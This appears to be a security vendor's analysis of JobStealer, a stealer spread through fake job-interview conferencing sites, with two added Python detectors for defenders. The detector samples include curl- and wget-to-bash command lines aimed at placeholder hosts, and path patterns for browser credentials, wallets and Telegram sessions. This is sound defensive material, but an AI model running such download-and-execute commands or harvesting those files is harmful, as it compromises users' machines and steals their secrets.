Instead of a job—stolen data and money. Trojan stealer targeting macOS and Windows users conceals itself in fake online interview apps
The attack begins with the threat actors contacting potential victims with a job offer. They invite the target to an online interview and send a link to the website of a video-conferencing “platform”, supposedly needed to join the call. These websites look presentable but are actually fraudulent: the malicious program JobStealer, disguised as an online conferencing app, is downloaded from them. Cybercriminals use different designs for these Internet resources and also change the names of the “software”. Our specialists identified variants called MeetLab, Juseo, Meetix, Carolla, and others. In some cases, the attackers use the names of real services, such as Webex.
Examples of websites for fake online conferencing services from which JobStealer is downloaded
To convince users that these platforms are fully functional, scammers create corresponding Telegram channels and social media accounts—for example, on X.
To disguise the trojan as a legitimate piece of software, threat actors create the appearance of activity on social networks
To install the app on devices running macOS, visitors to malicious websites are provided with two options:
- copy the bash command listed on the website and run it in the terminal;
- download a disk image file in the .dmg format and launch it.
The JobStealer trojan is downloaded from malicious websites both in the form of a dmg container and by running a bash command in the terminal
In the first case, when a command is executed in the terminal, a script is automatically downloaded from the Internet and then executed. This script downloads and runs the JobStealer’s executable file (detected as Mac.PWS.JobStealer.1).
In the second case, the dmg image offered for download already contains the script and the trojan’s executable file. When mounted, it displays instructions on how to “install” the app. These instructions state that the user needs to open the terminal and drag the provided script into its window. In fact, instead of the video conferencing app getting installed, the script launches the trojan file.
An image with the instructions that are displayed when the disk image file containing the JobStealer trojan is opened
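Both install paths end with the user running a downloaded script in the terminal, which leaves a recognisable trace in shell history and process command-line telemetry. The following Python classifier is an added example (not Dr.Web’s tooling and not code from the page): it flags command lines in which a downloader feeds a shell, whether by a plain pipe, by `sudo`, by command substitution, or nested inside `sh -c '…'`. The downloader and interpreter lists, the hostnames and the sample history lines are constructed assumptions.

```python
import re
import shlex

# Programs that fetch remote content and shells that would execute it. Assumed lists;
# a real hunt would extend them (e.g. python -c, osascript).
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "ksh", "dash"}
# $(curl ...), `wget ...` or <(curl ...) feeding a shell: command/process substitution.
SUBST = re.compile(r"(\$\(|`|<\()\s*(?:[\w./-]*/)?(curl|wget)\b")


def _first_cmd(stage):
    """Program a pipeline stage runs, skipping FOO=bar prefixes, sudo and env wrappers."""
    try:
        toks = shlex.split(stage)
    except ValueError:          # unbalanced quotes (stage was cut inside a quoted string)
        toks = stage.split()
    for tok in toks:
        if "=" in tok and not tok.startswith("-"):
            continue
        if tok in ("sudo", "env", "nohup"):
            continue
        return tok.rsplit("/", 1)[-1]   # drop any directory prefix
    return ""


def pipe_to_shell(cmdline):
    """Return 'pipe_to_shell', 'substitution_to_shell' or None for one command line."""
    # Split on single '|' only; '||' is a logical OR, not a pipe.
    stages = [s.strip() for s in re.split(r"(?<!\|)\|(?!\|)", cmdline)]
    names = [_first_cmd(s) for s in stages]
    for i, name in enumerate(names):
        if name in DOWNLOADERS and any(n in INTERPRETERS for n in names[i + 1:]):
            return "pipe_to_shell"
    if names[0] in INTERPRETERS:
        if SUBST.search(cmdline):
            return "substitution_to_shell"
        # bash -c '<inner>': classify the inner command line recursively
        try:
            toks = shlex.split(cmdline)
        except ValueError:
            return None
        if "-c" in toks and toks.index("-c") + 1 < len(toks):
            return pipe_to_shell(toks[toks.index("-c") + 1])
    return None


def scan_history(lines):
    """Return [(line, verdict)] for every history line that matches."""
    hits = []
    for line in lines:
        verdict = pipe_to_shell(line)
        if verdict:
            hits.append((line, verdict))
    return hits


# Constructed shell-history lines; the hostnames are placeholders, not real indicators.
SAMPLE_HISTORY = [
    "curl -fsSL https://meet.example.invalid/install.sh | bash",
    "wget -qO- https://meet.example.invalid/i.sh | sudo bash",
    'bash -c "$(curl -fsSL https://meet.example.invalid/i.sh)"',
    "sh -c 'curl -s https://meet.example.invalid/x | sh'",
    "curl -s https://api.example.invalid/status | grep ok || echo down",
    "brew install --cask zoom",
]

if __name__ == "__main__":
    for line, verdict in scan_history(SAMPLE_HISTORY):
        print(f"{verdict:24s} {line}")
```

The fifth sample line shows why a bare `curl` match is not enough: piping to `grep` is routine, and `||` must not be mistaken for a pipe. Run the same function over `~/.zsh_history` or EDR process-creation events to surface the copy-and-paste install step.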
Mac.PWS.JobStealer.1 is an executable container file in the Fat Mach-O format. It contains binary code for two processor architectures, x64 and arm64. When the trojan is launched, the component matching the infected computer’s processor is selected and initialized automatically.
It should be noted that different versions of Mac.PWS.JobStealer.1 exist. The earlier variants of the malware did not work on Mac computers with the arm64 architecture. They also lacked obfuscation—something the trojan’s creators began to add and strengthen when updating the stealer.
When launched, Mac.PWS.JobStealer.1 displays a phishing window that alerts users about an alleged error in the app’s operation. To “fix” this error, the malicious program asks users to provide their user account password.
A phishing window asking for a Mac user account password
Next, Mac.PWS.JobStealer.1 collects the following data:
- operating system version and computer ID;
- data from about 300 crypto wallet browser extensions installed in target browsers based on Chromium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, and CocCoc);
- cookie files from these browsers;
- passwords and bank card details saved in the browser’s autofill lists;
- Telegram messenger files from the directories /Library/Application Support/Telegram Desktop/tdata and /Documents/temp_data/Apps/Telegram, where session authorization keys, downloaded files, etc., are stored;
- user notes from the native macOS Notes application;
- evidence that the crypto wallets Ledger Live and Trezor Suite are present in the system.
This data is packed into a ZIP archive and uploaded to the C2 server.
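The collection list above is also a behavioural signature a defender can hunt for: one process that is not a browser or messenger touches several of these locations in succession and then writes a ZIP archive. The Python below is an added example, not code from the page or from Dr.Web; it correlates constructed file-access events per process and reports those that cross a threshold of distinct data classes. The Chromium profile, Notes and wallet-app paths are assumptions about where those applications keep their data on macOS, and the process names and events are constructed.

```python
import re
from collections import defaultdict

HOME = "/Users/alice"  # constructed home directory for the sample events

# One regex per data class JobStealer collects. The classes come from the write-up; the
# concrete paths are assumptions about where each application keeps that data on macOS.
TARGETS = {
    "chromium_credentials": re.compile(r"/Library/Application Support/.+/(Login Data|Web Data)$"),
    "chromium_cookies": re.compile(r"/Library/Application Support/.+/Cookies$"),
    "chromium_extensions": re.compile(r"/Local Extension Settings/[a-p]{32}/"),
    "telegram_session": re.compile(r"/(Telegram Desktop/tdata|temp_data/Apps/Telegram)/"),
    "apple_notes": re.compile(r"/group\.com\.apple\.notes/"),
    "wallet_presence": re.compile(r"^/Applications/(Ledger Live|Trezor Suite)\.app(/|$)"),
}
ARCHIVE = re.compile(r"\.zip$", re.IGNORECASE)


def classify(path):
    """Set of target classes a path belongs to (empty for uninteresting files)."""
    return {name for name, rx in TARGETS.items() if rx.search(path)}


def find_collectors(events, threshold=3):
    """Processes whose file activity looks like stealer collection.

    A process is reported when it touches at least `threshold` distinct target classes,
    or at least two classes and then creates a ZIP archive (the exfiltration container).
    A browser opening its own Login Data and Cookies hits only two classes and stays quiet.
    """
    by_pid = defaultdict(lambda: {"process": None, "categories": set(), "archive": None})
    for ev in events:
        rec = by_pid[ev["pid"]]
        rec["process"] = ev["process"]
        if ev["op"] == "open":
            rec["categories"] |= classify(ev["path"])
        elif ev["op"] == "create" and ARCHIVE.search(ev["path"]):
            rec["archive"] = ev["path"]
    findings = {}
    for pid, rec in by_pid.items():
        n = len(rec["categories"])
        if n >= threshold or (n >= 2 and rec["archive"]):
            findings[pid] = {"process": rec["process"],
                             "categories": sorted(rec["categories"]),
                             "archive": rec["archive"]}
    return findings


def _ev(pid, process, op, path):
    return {"pid": pid, "process": process, "op": op, "path": path}


AS = HOME + "/Library/Application Support"
# Constructed file-access telemetry: a browser and Telegram touching their own data
# (benign) and a fake conferencing app sweeping everything, then zipping it.
SAMPLE_EVENTS = [
    _ev(212, "Google Chrome", "open", AS + "/Google/Chrome/Default/Login Data"),
    _ev(212, "Google Chrome", "open", AS + "/Google/Chrome/Default/Cookies"),
    _ev(333, "Telegram", "open", AS + "/Telegram Desktop/tdata/key_datas"),
    _ev(501, "MeetLab", "open", AS + "/Google/Chrome/Default/Login Data"),
    _ev(501, "MeetLab", "open", AS + "/Google/Chrome/Default/Network/Cookies"),
    _ev(501, "MeetLab", "open", AS + "/BraveSoftware/Brave-Browser/Default/Local Extension Settings/abcdefghijklmnopabcdefghijklmnop/000003.log"),
    _ev(501, "MeetLab", "open", AS + "/Telegram Desktop/tdata/key_datas"),
    _ev(501, "MeetLab", "open", HOME + "/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"),
    _ev(501, "MeetLab", "open", "/Applications/Ledger Live.app/Contents/Info.plist"),
    _ev(501, "MeetLab", "create", "/tmp/collected.zip"),
]

if __name__ == "__main__":
    for pid, f in find_collectors(SAMPLE_EVENTS).items():
        print(pid, f["process"], ", ".join(f["categories"]), f["archive"])
```

The threshold is the tuning knob: at 3 the sample browser and messenger stay below it, while the fake conferencing app is reported with all six classes and the archive it created. In production the events would come from a file-monitoring source such as an EDR sensor or Endpoint Security framework client, and the process name would be checked against the application’s code signature rather than trusted as shown here.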
The malware’s creators have also prepared a version of JobStealer for computers running the Windows operating system. Its functionality is similar to that of the macOS version. In addition, some malicious websites distributing the stealer have dedicated sections for downloading the app for other popular operating systems. However, at this time, our virus analysts have not recorded their distribution. For example, the button for downloading the app for the Linux operating system is either inactive or leads to the Windows version of the trojan. And sections for downloading the app onto devices with iOS and Android inform users that these versions are in development. At the same time, it cannot be ruled out that the attackers will begin distributing variants of this trojan for those platforms in the future.
Malicious sites can potentially distribute versions of the JobStealer trojan designed for Linux, iOS, and Android
Dr.Web Security Space anti-virus products for macOS and Windows reliably detect and delete all known JobStealer malware modifications, keeping our users well protected from this threat. Fraudulent websites distributing the trojan are added to the database of non-recommended and dangerous resources and are also blocked by Dr.Web.
MITRE ATT&CK®
We analyzed Mac.PWS.JobStealer.1 using the MITRE ATT&CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. The following key techniques were identified:
| Stage | Technique |
|---|---|
| Execution | User Execution (T1204); Malicious Copy and Paste (T1204.004); Malicious File (T1204.002) |
| Discovery | File and Directory Discovery (T1083) |
| Collection | Automated Collection (T1119); Data from Local System (T1005); Credentials from Password Stores (T1555); Keychain (T1555.001); Credentials from Web Browsers (T1555.003); Input Capture (T1056); GUI Input Capture (T1056.002); Archive Collected Data (T1560) |
| Command and Control | Web Service (T1102) |
| Exfiltration | Automated Exfiltration (T1020); Exfiltration Over C2 Channel (T1041); Exfiltration Over Web Service (T1567) |